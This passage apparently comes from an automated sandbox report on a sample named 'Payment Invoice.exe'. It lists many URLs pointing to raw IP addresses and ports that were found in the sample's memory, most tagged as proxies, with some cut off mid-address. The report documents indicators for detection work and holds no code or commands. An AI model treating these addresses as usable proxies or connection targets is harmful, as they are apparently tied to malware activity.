                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:9367://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.84.107.94:8111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.84.107.94:8111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.145.176.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.145.176.250:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.145.176.250:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.132.215:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.132.215:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.139.59:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.139.59:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.4:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.4:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.16.96:46919
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.16.96:46919://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.12:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.12:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379d
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.234.222:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.234.222:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.242.202:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.242.202:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.247.93:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.247.93:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.254.129:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.254.129:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.105.107:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.105.107:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.134:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.134:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.165:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.165:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.124.167:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.124.167:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.125.135:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.125.135:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.172.165:8811
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.172.165:8811://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.64.130:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.64.130:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.133:8811
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.133:8811://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.68:8811
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.68:8811://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.77.220:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.77.220:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.79.76:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.79.76:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.96.66:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.96.66:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.197:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.98.197:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A20000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.134.210:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.134.210:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:25843
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:25843://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:43712
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:43712://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:49202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:49202://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:63055
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:63055://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:13003
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:13003x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:44523
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:44523://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.56.52
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.56.52://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.56.52:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.165.36:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.165.36:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.43.147:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.43.147:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.51.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.51.28:7497
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.51.28:7497://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.127.15
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.127.15://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.127.15:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.216.54://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:2563
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:2563://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:30011
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:30011://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:40351
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:40351://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:51718
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:51718://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36219
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36219://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:62916
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:62916://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.84.118:21777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.84.118:21777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.63.124:27294
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.63.124:27294://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:32824
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:32824://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.220.201:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.220.201:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.230.210:6940
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.230.210:6940://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197D9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:27029
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:27029://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:40998
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:40998://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:11802
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:11802://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:19693
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:19693://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:34144
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:34144://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:36694
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:36694://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:37847
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:37847://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.74.18
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.74.18://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.74.18:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.65.164:31979
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.65.164:31979://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.73.68:31979
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.73.68:31979://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.249.186:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.249.186:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.14
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:18636
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:18636://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:22500
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:22500://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:41746
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:41746://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:54395
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:54395://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:51405
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:51405://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.89.146:50605
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.89.146:50605://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.241:9191
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.241:9191://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.4
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:17982
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:17982://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:20435
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:20435://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23854
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23854://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:26545
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:26545://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:27887
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:27887://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C8A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:31724
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:31724://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:44719
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:44719://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:55198
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:55198://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:60775
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:60775://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.109.83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.109.83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.109.83:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.151.210.204:9000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.151.210.204:9000://proxy
